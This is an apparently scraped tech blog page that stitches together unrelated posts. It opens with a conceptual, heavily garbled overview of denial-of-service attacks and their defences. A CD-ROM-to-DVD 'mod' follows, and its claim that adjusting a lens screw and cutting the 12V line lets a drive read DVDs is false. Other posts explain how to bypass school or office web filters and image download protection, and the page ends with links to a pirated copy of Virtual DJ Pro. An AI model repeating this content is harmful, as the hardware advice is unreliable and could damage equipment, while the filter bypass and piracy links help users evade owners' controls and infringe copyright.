P­i­ng Flo­o­d­i­ng At­t­ack

Ping­ing­ inv­o­lv­es o­ne co­m­put­er sending­ a sig­nal t­o­ ano­t­herco­m­put­er expect­ing­ a respo­nse b­ack­. Respo­nsib­le use o­f­ ping­ing­ pro­v­idesinf­o­rm­at­io­n o­n t­he av­ailab­ilit­y­ o­f­ a part­icular serv­ice. Ping­ F­lo­o­ding­ is t­heext­rem­e o­f­ sending­ t­ho­usands o­r m­illio­ns o­f­ ping­s per seco­nd. Ping­ F­lo­o­ding­ cancripple a sy­st­em­ o­r ev­en shut­ do­wn an ent­ire sit­e.

A­Pi­n­g Flo­o­di­n­g A­t­t­a­ck­ flo­o­ds t­he­ v­i­ct­i­m’s n­e­t­wo­rk­ o­r ma­chi­n­e­ wi­t­h I­P Pi­n­gpa­ck­e­t­s. A­t­ le­a­st­ 18 o­pe­ra­t­i­n­g sy­st­e­ms a­re­ v­uln­e­ra­ble­ t­o­ t­hi­s a­t­t­a­ck­, but­ t­he­ma­jo­ri­t­y­ ca­n­ be­ pa­t­che­d. T­he­re­ a­re­ a­lso­ n­ume­ro­us ro­ut­e­rs a­n­d pri­n­t­e­rs t­ha­t­ a­re­v­uln­e­ra­ble­. Pa­t­che­s ca­n­n­o­t­ curre­n­t­ly­ be­ a­ppli­e­d t­hro­ugho­ut­ a­ glo­ba­l n­e­t­wo­rk­e­a­si­ly­.

S­murf Attac­k

A Sm­urf At­t­ack i­s m­od­i­fi­cat­i­on­ of t­he “p­i­n­g at­t­ack”an­d­ i­n­st­ead­ of sen­d­i­n­g p­i­n­gs d­i­rect­l­y­ t­o t­he at­t­acked­ sy­st­em­, t­hey­ are sen­t­ t­o ab­road­cast­ ad­d­ress wi­t­h t­he vi­ct­i­m­’s ret­urn­ ad­d­ress. A ran­ge of I­P­ ad­d­ressesfrom­ t­he i­n­t­erm­ed­i­at­e sy­st­em­ wi­l­l­ sen­d­ p­i­n­gs t­o t­he vi­ct­i­m­, b­om­b­ard­i­n­g t­hevi­ct­i­m­ m­achi­n­e or sy­st­em­ wi­t­h hun­d­red­s or t­housan­d­s of p­i­n­gs.

On­e­ sol­ut­ion­ is t­o p­re­v­e­n­t­ t­h­e­ We­b se­rv­e­r from­ be­in­g use­da­s a­ broa­dca­st­. Rout­e­rs m­ust­ be­ con­figure­d t­o de­n­y IP­-Dire­ct­e­d broa­dca­st­s from­ot­h­e­r n­e­t­works in­t­o t­h­e­ n­e­t­work. A­n­ot­h­e­r h­e­l­p­ful­ m­e­a­sure­ is t­o con­figure­ t­h­e­rout­e­r t­o bl­ock IP­ sp­oofin­g from­ t­h­e­ n­e­t­work t­o be­ sa­v­e­d. Rout­e­rs con­figure­d a­ssuch­ wil­l­ bl­ock a­n­y p­a­cke­t­s t­h­a­t­ don­or origin­a­t­e­ in­ t­h­e­ N­e­t­work.T­o be­ e­ffe­ct­iv­e­ t­h­is m­ust­ be­ don­e­ t­o a­l­l­ rout­e­rs on­ t­h­e­ n­e­t­work.

SY­N­ Flo­o­din­g­ At­t­ack

Th­is a­tta­ck­ ex­plo­its vu­lner­a­bility­ in th­e TCP/IPco­m­m­u­nica­tio­ns pr­o­to­co­l. Th­is a­tta­ck­ k­eeps th­e victim­ m­a­ch­ine r­espo­nd­ing ba­ck­ to­a­ no­n-ex­istent sy­stem­. Th­e victim­ is sent pa­ck­ets a­nd­ a­sk­ed­ to­ r­espo­nse to­ a­sy­stem­ o­r­ m­a­ch­ine with­ a­n inco­r­r­ect IP a­d­d­r­ess. A­s it r­espo­nd­s, it is flo­o­d­ed­with­ th­e r­equ­ests. Th­e r­equ­ests wa­it fo­r­ a­ r­espo­nse u­ntil th­e pa­ck­ets begin to­tim­e o­u­t a­nd­ a­r­e d­r­o­pped­. D­u­r­ing th­e wa­iting per­io­d­, th­e victim­ sy­stem­ isco­nsu­m­ed­ by­ th­e r­equ­est a­nd­ ca­nno­t r­espo­nd­ to­ legitim­a­te r­equ­ests.

When a no­rm­al T­C­P c­o­nnec­t­io­n st­art­s, a dest­inat­io­n ho­st­rec­eiv­es a SYN (sync­hro­niz­e/st­art­) pac­k­et­ f­ro­m­ a so­urc­e ho­st­ and sends bac­k­ aSYN AC­K­ (sync­hro­niz­e ac­k­no­wledg­e) respo­nse. T­he dest­inat­io­n ho­st­ m­ust­ t­he hearan ac­k­no­wledg­em­ent­, o­r AC­K­ pac­k­et­, o­f­ t­he SYN AC­K­ bef­o­re t­he c­o­nnec­t­io­n isest­ablished. T­his is ref­erred as t­he “T­C­P t­hree-way handshak­e”.

D­ecrea­s­in­g­the time-o­ut wa­itin­g­ p­erio­d­ fo­r the three wa­y­ ha­n­d­s­ha­ke ca­n­ help­ to­ red­uce theris­k o­f S­Y­N­ flo­o­d­in­g­ a­tta­cks­, a­s­ will in­crea­s­in­g­ the s­ize o­f the co­n­n­ectio­n­queue (the S­Y­N­ A­CK queue). A­p­p­ly­in­g­ s­ervice p­a­cks­ to­ up­g­ra­d­e o­ld­er o­p­era­tin­g­s­y­s­tems­ is­ a­ls­o­ a­ g­o­o­d­ co­un­termea­s­ure. Mo­re recen­t o­p­era­tin­g­ s­y­s­tems­ a­reres­is­ta­n­t to­ thes­e a­tta­cks­.

IPF­r­a­gmen­ta­tio­n­/O­ver­la­ppin­g F­r­a­gmen­t A­tta­ck­

To fa­cilita­te IP tra­n­­smission­­ over compa­ra­tively­ con­­g­ested­n­­etw­orks. IP pa­ckets ca­n­­ be red­u­ced­ in­­ size or broken­­ in­­to sma­ller pa­ckets. By­ma­kin­­g­ the pa­ckets very­ sma­ll, rou­ters a­n­­d­ in­­tru­sion­­ d­etection­­ sy­stems ca­n­­n­­otid­en­­tify­ the pa­ckets con­­ten­­ts a­n­­d­ w­ill let them pa­ss throu­g­h w­ithou­t a­n­­y­exa­min­­a­tion­­. W­hen­­ a­ pa­cket is rea­ssembled­ a­t the other en­­d­, it overflow­s thebu­ffer. The ma­chin­­e w­ill ha­n­­g­, reboot or ma­y­ exhibit n­­o effect a­t a­ll.

I­n­an­ O­v­er­l­appi­n­g Fr­agmen­t Attack, the r­eassemb­l­ed­ packet star­ts i­n­ the mi­d­d­l­e o­fan­o­ther­ packet. As the o­per­ati­n­g system r­ecei­v­es these i­n­v­al­i­d­ packets, i­tal­l­o­cates memo­r­y to­ ho­l­d­ them. Thi­s ev­en­tu­al­l­y u­ses al­l­ the memo­r­y r­eso­u­r­ces an­d­cau­ses the machi­n­e to­ r­eb­o­o­t o­r­ han­g.

IPSeq­u­en­­ce Prediction­­ A­tta­ck

Usin­gt­h­e SY­N­ F­l­ood m­et­h­od, a­ h­a­cker ca­n­ est­a­bl­ish­ con­n­ect­ion­ wit­h­ a­ v­ict­im­ m­a­ch­in­ea­n­d obt­a­in­ t­h­e IP pa­cket­ seq­uen­ce n­um­ber in­ a­n­ IP Seq­uen­ce Predict­ion­ A­t­t­a­ck.Wit­h­ t­h­is n­um­ber, t­h­e h­a­cker ca­n­ con­t­rol­ t­h­e v­ict­im­ m­a­ch­in­e a­n­d f­ool­ it­ in­t­obel­iev­in­g it­’s com­m­un­ica­t­in­g wit­h­ a­n­ot­h­er n­et­work m­a­ch­in­es. T­h­e v­ict­im­ m­a­ch­in­ewil­l­ prov­ide req­uest­ed serv­ices. M­ost­ opera­t­in­g sy­st­em­s n­ow ra­n­dom­ize t­h­eirseq­uen­ce n­um­bers t­o reduce t­h­e possibil­it­y­ of­ predict­ion­.

DNSCache­ Poi­soni­ng

DNS pro­v­ide­s dist­ribut­e­d h­o­st­ info­rm­a­t­io­n use­d fo­r m­a­ppingdo­m­a­in na­m­e­s a­nd IP a­ddre­sse­s. T­o­ im­pro­v­e­ pro­duct­iv­it­y­, t­h­e­ DNS se­rv­e­r ca­ch­e­st­h­e­ m­o­st­ re­ce­nt­ da­t­a­ fo­r q­uick re­t­rie­v­a­l. T­h­is ca­ch­e­ ca­n be­ a­t­t­a­cke­d a­nd t­h­e­info­rm­a­t­io­n spo­o­fe­d t­o­ re­dire­ct­ a­ ne­t­wo­rk co­nne­ct­io­n o­r blo­ck a­cce­ss t­o­ t­h­e­ We­b sit­e­s),a­ de­v­io­us t­a­ct­ic ca­lle­d DNS ca­ch­e­ po­iso­ning.

The b­es­t d­efens­e ag­ains­t p­rob­l­em­­s­ s­uch as­ D­NS­ cachep­ois­oning­ is­ to run the l­ates­t vers­ion of the D­NS­ s­oftware for the op­erating­s­ys­tem­­ in us­e. New vers­ions­ track p­end­ing­ and­ s­erial­iz­e them­­ to hel­p­ p­revents­p­oofing­.

SN­MP A­tta­ck­

Mos­t n­­etwork dev­ic­es­ s­up­p­ort S­N­­MP­ bec­aus­e it is­ ac­tiv­e bydef­ault. An­­ S­N­­MP­ Attac­k c­an­­ res­ult in­­ th­e n­­etwork bein­­g map­p­ed, an­­d traf­f­ic­ c­an­­be mon­­itored an­­d redirec­ted.

The­ be­st de­fe­n­se­ a­g­a­in­st this a­tta­ck­ is u­pg­r­a­din­g­ toSN­M­P3, w­hich e­n­cr­ypts pa­ssw­or­ds a­n­d m­e­ssa­g­e­s. Sin­ce­SN­M­P r­e­side­s on­ a­lm­ost a­ll n­e­tw­or­k­ de­vice­s, r­ou­te­r­s, hu­bs, sw­itche­s, Se­r­ve­r­s a­n­dpr­in­te­r­s, the­ ta­sk­ of u­pg­r­a­din­g­ is hu­g­e­. Som­e­ ve­n­dor­s n­ow­ offe­r­ a­n­ SN­M­P M­a­n­a­g­e­m­e­n­ttool tha­t in­clu­de­s u­pg­r­a­de­ distr­ibu­tion­ for­ g­loba­l n­e­tw­or­k­s.

UDP F­lo­o­d At­t­ack­

AUDP­ F­lo­o­d Attacks­ li­n­ks­ two­ un­s­us­p­ecti­n­g s­ys­tems­. B­y S­p­o­o­f­i­n­g, the UDP­ f­lo­o­dho­o­ks­ up­ o­n­e s­ys­tem’s­ UDP­ s­erv­i­ce (whi­ch f­o­r tes­ti­n­g p­urp­o­s­es­ gen­erates­ as­eri­es­ o­f­ characters­ f­o­r each p­acket i­t recei­v­es­) wi­th an­o­ther s­ys­tem’s­ UDP­echo­ s­erv­i­ce (whi­ch echo­es­ an­y character i­t recei­v­es­ i­n­ an­ attemp­t to­ tes­tn­etwo­rk p­ro­grams­). As­ a res­ult a n­o­n­-s­to­p­ f­lo­o­d o­f­ us­eles­s­ data p­as­s­es­ b­etween­two­ s­ys­tems­.

Sen­d M­ai­l­ At­t­ac­k

In th­is­ attac­k, h­und­r­ed­s­ o­f th­o­us­and­s­ o­fm­es­s­ages­ ar­e s­ent in a s­h­o­r­t per­io­d­ o­f tim­e; a no­r­m­al lo­ad­ m­igh­t o­nly be 100 o­r­1000 m­es­s­ages­ per­ h­o­ur­. Attac­ks­ agains­t S­end­ M­ail m­igh­t no­t m­ake th­e fr­o­nt page,but d­o­wntim­e o­n m­aj­o­r­ webs­ites­ will.

F­o­r co­mp­a­n­ies who­se rep­u­ta­tio­n­ dep­en­dso­n­ the relia­bility­ a­n­d a­ccu­ra­cy­ o­f­ their Web-Ba­sed tra­n­sa­ctio­n­s, a­ Do­S a­tta­ckca­n­ be a­ ma­j­o­r emba­rra­ssmen­t a­n­d a­ serio­u­s threa­t to­ bu­sin­ess.

Con­clu­sion­

Frequent d­enial-o­­f-s­ervic­e attac­ks­ and­ ac­hang­e in s­trateg­y­ by­ “Blac­k-Hat Hac­kers­” are p­ro­­mp­ting­ enterp­ris­es­ to­­d­emand­ tec­hno­­lo­­g­y­ that p­ro­­ac­tively­ blo­­c­ks­ malic­io­­us­ traffic­.

To­o­ls a­nd ser­vices th­a­t r­ef­lecta­ppr­o­a­ch­es to­ co­m­ba­t su­ch­ Do­S a­tta­cks h­a­ve been intr­o­du­ced with­ tim­e. Th­ese a­r­eno­r­m­a­lly­ u­pgr­a­des to­ wh­a­t wa­s pr­o­du­ced bef­o­r­e. No­ so­lu­tio­n is ever­ sa­id to­ be a­nu­ltim­a­te so­lu­tio­n to­ def­end Do­S a­tta­cks. Despite th­e new tech­no­lo­gy­ co­m­ing ever­y­da­y­, th­e a­tta­cks a­r­e likely­ to­ co­ntinu­e.

S­o­urce­ :- ht­t­p://www.t­echiwa­reho­use.co­m/cms/en­g­in­e.php?pa­g­e_id=21b0d480

| 0 comments ]

There are two types of CD-ROM drives we can mod:
24x to 40x
40x or higher
Drives slower than 24x are too old to be modded.
24x to 40x CD ROMs
Laser Head Adjustments:
The track pitch of CDs is 1.6 microns, and the track pitch of DVDs is only 0.8 microns. The minimum length of track pits of CDs is 0.843mm, and the minimum length of track pits of DVDs is 0.293mm. That's why DVD discs can store much more data in the size of a CD.
Pinpointing this situation, we need to adjust the laser head so it can read discs with smaller track pitchs and shorter track pits. Open up the CD-ROM drive, do you see a lens on the rail? That's the laser head. On the side of the laser head, there's a screw you can adjust.
This is the key of this mod.
This screw can adjust the size of the laser beam that lands on the disc. Referring to the above, after adjusting, the laser beam should be less than 0.293mm, to suit the needs of DVD discs. So turn that screw 2-3 times. I got this number through trial and error. Mark with a pencil, in case you forget how many times you turned that screw.
Speed adjustments:
DVD-ROM drives can play DVD movies smoothly at 4x speed. If we're modding a 32x CD-ROM drive, the rotation speed is obviously too high, increasing heat, and shortening the life of the drive.
So we need to decrease the speed of it.
Most people know that power supplies can provide 5V (red wire) and 12V (yellow wire) electricity output for Molex connectors. Find the Molex connector you'll plug into the modded CD-ROM drive, cut the yellow wire or insulate it with tape, so only 5V of electricity is transferred to the CD-ROM drive. The speed of the drive is now 32 * 5/17 = 9.41x and can now fulfill our requirements.

40x or higher CD ROMs
When 40x CD-ROM drives are released, most manufacturers are already producing DVD-ROM drives. To lower cost, they use the same core as DVD-ROM drives with DVD functions disabled. What we need to do here is to re-enable the DVD function.
Open up the CD-ROM, behind the circuit board, look for a jumper that says DVD JUMP. Find a jumper to connect this jumper. Thin metal wire also works fine.
OK, so the DVD function is unlocked, but we still need to decrease the speed. Use the instructions above on how to decrase the speed of the drive.
Notes:
Modded drives cannot be detected in POST, that means you cannot use it in DOS. But once you get into Windows, the drive works fine.
Modded drives have no region code problems.
Modded drives MIGHT NOT read DVD9 discs, that's why I said you can watch most retail DVDs in the beginning

| 0 comments ]


yeah! its true, you can actually download HD videos uploaded on YouTUBE.
KeepHD is online web service tool which let you download you tube high definition video easily.

Apart from high definition video , you can also download you tube videos in mobile friendly .3gp format.

It also support mp4 and .flv format. In case if you don’t want to download video and just want to watch it online

| 0 comments ]

all must be aware that in some schools, colleges or office social network sites like Friendster, Facebook, Myspace, Bebo, Hi5, Orkut, etc? are blocked by the Administrator.
Here’s few ways you can bypass the restrictions and surf like normal, but please check with your local authorities before using them.



1)Using IP Instead of URL

This depends on the software/application used. Sometimes blocked sites are stored as a list of URLs (eg. www.yahoo.com, www.donwload.com,etc) and typing the IP instead of the URL might sometimes work. In a local computer, doing a ping domain.com command in Command Prompt (Mac users use Terminal) will return you the IP address. You can also do it online via www.whatsmyip.org

2)Redirection with Short URL service

Sometimes the URL you intend to browse might be ban, but converting them to another a shorter URL with short URL services might just help you to bypass the settings.

Here’s 2 Short URL service we’ve previously mentioned - MooURL, SnipURL



3)Google Cache

Search engines like Google and Yahoo cache webpages and these cached pages are stored in search engines themselves, which likely will be added to the blocked list. Click on the ‘cache’ will bring you to a cache version of the page, as updated as how Google caches it.

4)Internet Archive - Wayback Machine

Wayback Machine is a internet service that periodically keeps a copy of almost all websites in the Internet way from the date they’re started. Clicking on the latest copy of what Wayback Machine have should be somewhat similar to the real site. Another way to access blocked sites via caches.

5)Anonymous Surfing

Some site allows you to take advantage of their proxy or domain to surf other sites as anonymous. Here’s some proxy websites

# http://www.hidemyass.com
# http://www.anonymizer.com
# http://www.wujie.net
# http://www.ultrareach.net
# http://surfshield.net
# http://www.guardster.com/subscription/proxy_free.php
# http://anonymouse.ws/anonwww.html
# http://www.browser-x.com
# http://www.spysurfing.com
# http://www.xerohour.org/hideme
# http://www.proxyz.be

6)Use Proxy in Browsers

There are tons of sites out there that distributes free proxies of almost any country. Here’s an example. Check out the following methods on how/where to insert proxies in your web browsers.

Proxy Surfing - Firefox

Under Advanced tab, select Network tab, then click inside Connection Settings. Select Manual proxy configuration, put proxy under HTTP proxy.

Proxy Surfing - Internet Explorer

Go to Tools -> Internet Options. Select Connections tab. Click into LAN Settings, check Proxy Server. Insert your proxy URL inside Address.


7)Bypass with Translations services

Online translation services like AltaVista BabelFish, Google Translate allows you to translate a website from one language to another and display the translated results on their own page.The trick here is to enter the URL (website you’re blocked), retranslate it even if you don’t need to and let Google or AltaVista fetch you the content.

8)Subscribe to RSS Feed

This might not work for all sites, but if the site you intended to visit provides RSS feeds, you can subscribe and read it with a RSS reader, or have it regularly send the contents to your email
9Retrieve web pages via Email

Web2Mail is a free service that sends websites you want to read right into your inbox. All you need to do is send an email to www@web2mail.com with the URL as subject title.

| 0 comments ]


Normally, you can save Images/Pictures from Flickr (or any website) by right clicking the photograph and saying "Save Image As.." but in the case of protected Flickr images,
all you will see on the desktop is a blank 1x1 pixel placeholder image called spaceball.gif

Reason : When a Flickr or orkut member has set download permissions to disallow his/her photos from being downloaded, a transparent image is overlaid on the actual photo so the right-click method fails.
Solution : You may either use the good-old Print Screen / Screenshot or any of the methods below to defeat the Orkut image protection...

For Firefox: Go to Tools -> Page Info -> Media - Scroll down until you see that orkut image in the Media Preview Window. Click the Save As button.

See the Screenshot Below























In IE, Opera, Safari or Firefox: Right click the Flickr web page and chose "View HTML source" - now search for "spaceball.gif" in the HTML source. You'll find the full location of the protected image enclosed in the img src=" Link of Image "










Now find the Actual image Link and Download it.

You can also use this trick to Download images from other image protected sites.

| 0 comments ]

Welcome to Advertising section of KILL-SYSTEM32.CO.CC, this page gives you a complete insight of advertising policy we follow here. Here we help our advertiser to get the maximum for the money they put into advertising.You can check all the links and explanation done and contact us for more.

  1. About
  2. Seo and Traffic Stats: PR ,Alexa, Technorati,Demographics Result.
  3. Who can advertise here ?
  4. How do I Get started on Advertising here?
  5. Advertising Policy ( Including change of policy system)
  6. Need more information? Contact Us

About KILL-SYSTEM32.CO.CC

KILL-SYSTEM32.CO.CC is targeted to audience who are interested in lea lerning technology and keep themselves update with quick news with complete in depth explanation. This includes Internet Geeks, tech heads, security interpretors. KILL-SYSTEM32.CO.CC covers a large explanation of geeky things which can be understood by anybody with a bit of tech idea. It involves :

  • Discussion on Technology News.
  • Reviews of upcoming hardware and software with in depth analysis.
  • Explanation of new technology with images and videos.

SEO and Traffic Stats

  • SEO: KILL-SYSTEM32.CO.CC has a page rank of 5 with Alexa ranking of 47,438. Its one of the fastest growing site as the alexa rank doubled in 2 months from 140,091. Technorati Rank is 9,671 which also has increased double in last 2 months
  • Traffic:KILL-SYSTEM32.CO.CC generates 2.5K Page views and 2.0K unique unique visitors every month. 80% of traffic comes from Search Engines and its increasing everyday.
  • Demographic: The major source of audience that come to KILL-SYSTEM32.CO.CC is from USA and Europe. Another major source are from Indonesia and India.


Who can advertise here ?


I am interested to get advertiser who fall in the same category as this blog does. This blog is all about technology, so if you have a technology related site feel free to use this scheme for advertising. I will not accept any site which has is not related or not suitable.

How do I Get started on Advertising here?

This is simple.Follow the Simple steps:-

  • Choose a Advertising Scheme.
  • Email me through the contact form by choosing “Book an advertising Scheme” as an option and complete details of yous site , your name and email. You need to give a complete detail of how long you want to run the scheme.
  • Your request is verified and if you are eligible, a reply to your email is sent back.
  • Depending on the scheme, you need to reply back with required images ( in case of banner ad) and payment made at the requested paypal address.
  • After the receipt of payment, you ads stars running and you will receive an email which will contain the start date and end date of your chosen advertising scheme.
  • When the advertising scheme expires, the ads will be removed and given to some other advertiser if you have not booked the same scheme in well advance.

Advertising Policy ( Including change of policy system)

KILL-SYSTEM32.CO.CC holds the final decision of deciding the advertisers and running your advertisement on this site. Your ads will run without any problems unless:-

  • You have made a false impression of your site.
  • If you have cheated to fit into the category.
  • Your advertising scheme has expired and you have not made any advance booking.

If you fall in any of the above mentioned clause, your advertising scheme will be discontinued and no repayment will be made.

There is no case where you have made the payment and want it back. Your ads will run without any problems for the chosen duration of time and removed after that. Please make a final decision before you book an advertising scheme.

Change of Policy: This means if there is any change in pricing or scheme your current running scheme will not be affected but any further booking will fall into the new scheme.

Need more information? Contact Me.

If the above explanation is not clear, you can still contact me for further explanation. We can sit and talk through email and clear your doubts and any confusion you have. You can contact me through My No 9821776537 by choosing “Query on advertising” in the “Required Reason” option. I hope to see you responding and We will do best so you get benefited in return. Thanks.!!

| 0 comments ]

If you are interested in linking, quoting, or reprinting articles from KILL-SYSTEM32 in whole or in part, please do read our copyright policy:

How to link to KILL-SYSTEM32 ?

You can create a post with short note of the article which you want to link with giving credit to Author and the post with complete URL. Please do not just hyper link to home page. Moreover the short note should be more than a paragraph.

How to re-print content to Off line or Print Media ?

If you are publishing a Magazine or Newspaper and Interested to re print my article, you are welcome to do so but you will have to provide the Authors Name, The Site name and Complete URL of the article.

How to re-print content to Online Print Media

This is not a very good idea but if you feel to do so please contact me with your request. They can be re-printed only after proper approval from the author and in this cases the authors have to be paid. For further details use our contact page.

What will happen when you copy the content without permission?

  • Every hosting service follow Copyright act which means any site hosted on their site are not allowed to copy or infringe anything from others without prior permission. So if you do, you r hosting will be informed and your sight will be suspended. I have done it twice before and I will do it again.
  • Google follows something for copyright protection called as DMCA ( Digital Millennium Copyright Act). Acting on which can not only get your site banned but also out of Google index. You will not be able to get any visitors from anywhere.
  • The rest I will do is call upon every bloggerI know and let them know about it.

So best is don’t copy else you will face a situation from where you will have no go other than to ban the site yourself.

| 0 comments ]

Disclaimer about the Name:KILL-DRIVER32 is just a mere abbreviation of Technology Spot or a pool of technical stuff.It has nothing to do with any persons or companies name.

Disclaimer about the Content:

This Blog is Just posts of personal experience of what i have learned and experienced.It was nothing to do with anybody else.Whatever i have written or i am going to write could work in some case and might not hold true in others.So i would like to say that all i am writing is for the benefit of the readers and if theres any issues do write back to me and i will try to fix it if possible but I dont hold any responsibility in case something goes wrong with your machine or you.

Disclaimer about the logo:

This logo had been designed by me on Saturday,May 09 2009 and is not copied from any site or company or related ot a person.If it is so is a major co-incidence.

| 0 comments ]

There are number of ways you can subscribe to KILL-SYSTEM32.co.cc to get news at your doorstep!( emails,newsletter and feeds are the new generation doorstep).You can choose as per your continence.


How to subscribe through Feeds?

For even who don’t know,

A web feed is a data format used for serving users frequently updated content. Content distributors syndicate a web feed, thereby allowing users to subscribe to it. Making a collection of web feeds accessible in one spot is known as aggregation.( via wikipedia)

Means You can add to your My Yahoo or My Google Home pages and read it when you visit there or through your favorite reader. Click here Find your list

How to make an Email Subscription ?

Very Busy for a feed ? Here is your answer that is most popularly used by readers all over the world to get everything in your mailbox.You can subscribe giving your email address below(It wont be used for any other purpose i can promise that) and get my posts instantly when i post it.Easy Isn’t it.

Enter your email address:

I am using third party tool for that and even they will never use it for other purpose.You can just click on the image you see below and enter your email address.You will receive an email from feedburner asking for your confirmation.As soon as you click on the link, your email subscription is ready to roll.Every time i make a new post you will receive an email contain that post.Thus making is simpler for you to keep yourself updated.Try it.

Subscribe to Podcast



Podcast feed

| 0 comments ]

Whats The Idea behind KILL-SYSTEM32.co.cc

This site is an effort to make the life of normal users to understand on how to use their CP or computer and Safe. We also aim towards improving the way you should browse isafely keeping you away from the phishing and electronic threats.

We write articles here in a very simple manner with examples , images and even videos so you get it right. This is just a starting of a future vision i have. So even if you are a normal non technical person but you will have a question “How does this fan works?”. Don’t You?

Here at kill-system32.co.cc We just don’t believe in just news.I would rather give you analysis and review so even you get to know whats good for you and what you can use more effective.

This site is free enough to answer or accept any question or comments you have.Do not hesitate to ask, because if you ask we all will learn.

How to find more information here ?

The following things you should do to keep yourself updated with us

I am running subscription for this blog.So if you like this : Subscribe Here

More about Authors :About Sumit Chavan

Want to Advertise ? Read more on out Advertise Page

Disclaimer | Copyright | Privacy Policy




| 0 comments ]

KILL-SYSTEM32.co.cc value our readers and visitors privacy. However for maintaining statics and keeping away spammers we do need to collect and preserve small piece of information of people who visit our site.

Privacy Policy:

  • We use analytical tool such as Google Analytics, 103bees to understand where our customers and visitors are coming from. In this we collect information such as IP Addresses and Operating system used. However these data are not shared with a third party and strictly kept for increasing the performance of website.
  • The site is hosted at asmallorange.com ( hosting company) but no data is shared with them either.
  • The site uses a blogging software called as WordPress which stores a small amount of information in users computer when he or she comments. This is of very small size and no way is a malware or script which hacks a computer for information.
  • You are free to read and utilize the resource available here but now allowed to copy the content. Read more on our Copyright Policy.
  • We use third-party advertising companies to serve ads when you visit our Web site. These companies may use information (not including your name, address email address or telephone number) about your visits to this and other Web sites in order to provide advertisements about goods and services of interest to you. Users may out out of the use of the DART cookie by visiting the Google ad and content network privacy policy.

Comment Policy:

“Commenting a weblog or any site is one of the major responsibility on the side of reader as its same as telling something about a person or something in public….It Leaves A Major Impact. ”

Comments are means of telling somebody what he or she did but at the same time misusage can be high.Its like how you say it.If you find a problem you can say its wrong with proper reasons but nobody should or have a right to make the person feel miserable.

Blogger community is growing faster than anything on internet.Professional Blogging has become a signature of many persons as well companies.They have created a respect for each other,Dont dis-respect it.

We are open to all kinds of comment a reader want to make till he is not dis-respecting a post or page.This blog or anyblog is trying to teach community to learn from each other so suggest tell but be nice.However i would like to tell my readers what i think:

  • I love comments on this blog - Feel Free to say.It does not matter to me whether you know about the post or not but u might have your own point of view.Your welcome always…and we can learn from my mistakes too.
  • No Spams Please - Please don’t spam.We delete them so the post looks much cleaner.
  • Spawner - You are welcome to put signatures on the comment like if you find similar articles or a better one do leave it…
  • Signatures - We don’t mind having links on the comment but make sure its relevant to your post and help other readers to learn more.Please don’t use it for advertising your blogs.

“My advice to those commenting on blogs (not just mine) is that in a sense you are visiting someone else’s home when you leave a comment. Comments have the ability to build up our tear down your reputation. They are a permanent record of who you are and what you stand for - so take care - be gracious - make sure they add value (not only to the blog you are visiting but also to your own online profile). “

| 1 comments ]

Virtual DJ 5.2.1 Pro MultiLang (Portable)



Atomix Virtual DJ is the MP3 mixing software that targets every DJ from bedroom DJs to professional superstars such as Carl Cox, and is used everyday by millions of DJs, and in many big clubs. It features a breakthrough BeatLock engine that will keep your songs in tune and let you work your mixes incredibly faster than any other DJ. The automatic seamless loop engine and the new synchronized sampler will let you perform astounding remixes on the fly. VirtualDJ is compatible with timecoded vinyls that let you scratch your MP3s directly on a real turntable, and with many other DJ equipment. VirtualDJ will also let you mix and scratch music videos right from your turntables. You can use several interfaces to suit both beginners and professionals, record your mixes and burn them on CD, rip DVD, rip vinyl, create your own Internet radio, automatically mix playlists, use VST effects, display karaoke, and play DRMed file like Yahoo!

Features:
• Twin independent zero-latency players with:
• Standard controls (play, pause, stop, cue)
• Volume control
• Pitch control (from -34 to +34%)
• 3 band equalizers with Kill + gain
• One-click beat matching and synchronisation (new FAME algorithm)
• BeatLock engine: your songs will always stay in time, and you can work your mixes incredibly faster than any other DJ could
• Automatic beat-matched crossfading
• On-the-fly automatic BPM calculation
• Automatic pitch matching
• Automatic level matching
• Automatic beat matching
• Dynamic beat visualizer for easy "drag'n'drop" beat-matching
• Real scratch simulation
• Virtual scratch: Scratch your mp3 with your bare hand
• Automatic beat-aware LOOP function
• Synchronised sampler with 12 instant slots
• Master Tempo pitch algorithm
• Automatic first beat and last beat detection
• Automatic 4/4 phase detection
• OSC network synchronisation
• Infinite number of beatlocked desks (local multi-instance or network)
• Infinite number of cue points saved per songs
• Beat-aware effect plugins (included: beatgrid, flippin, vocal remover, filter, flanger, backspin, brake, etc...)
• VST effects compatibility
• Video mix with TV output (mix songs and/or video clips !)
• Full karaoke support
• Proprietary of FreeFrame video effects
• Inifite number of video effect simultaneously
• DJ-adapted video transition plugins
• Song database engine with easy-to-use search feature
• CoverFlow or text-only song browsing
• Compatible with iTunes playlists
• ID3 compatibility
• Automatic "filter" folders
• Automatic Hot-Swap of external harddrives
• Ready-to-burn file recording to burn your own mixed CDs
• Broadcast on the Internet
• CD to MP3 encoder
• Optional 3D sound card, 2 sound cards or Y-splitter for real-time monitoring or external mixtable use
• ASIO soundcard compatibility
• Fully customisable (skin engine and shortcut macro enngine)
• External MIDI keyboard compatibility for shortcuts
• Compatibility with most external controllers (DMC2, DAC3, iCDX, TotalControl, BCD2000, DJConsole, etc...)
• Optional automatic mixing: Virtual DJ recognizes the style of the music (techno, hip hop, lounge) and adapt its mix in consequence

Extract (with a PortableApps folder at the device's root) and run VirtualDJPortable.
Language fixed by launcher according SystemLang: English, French, German, Italian, Spanish.
Settings of installed VirtualDJ should be preserved.

Size : 12.7 MB



Rapidshare Account :

http://rapidshare.com/files/223560888/VirtualDJ_Portable_5.2.1_MultiLang.rar


Uploading Account :

http://uploading.com/files/CS0Q8EBI/VirtualDJ_Portable_5.2.1_MultiLang.rar.html

Easy Share Account :

http://www.easy-share.com/1904647904/VirtualDJ_Portable_5.2.1_MultiLang.rar

Uploaded To Account :

http://ul.to/vfjgnm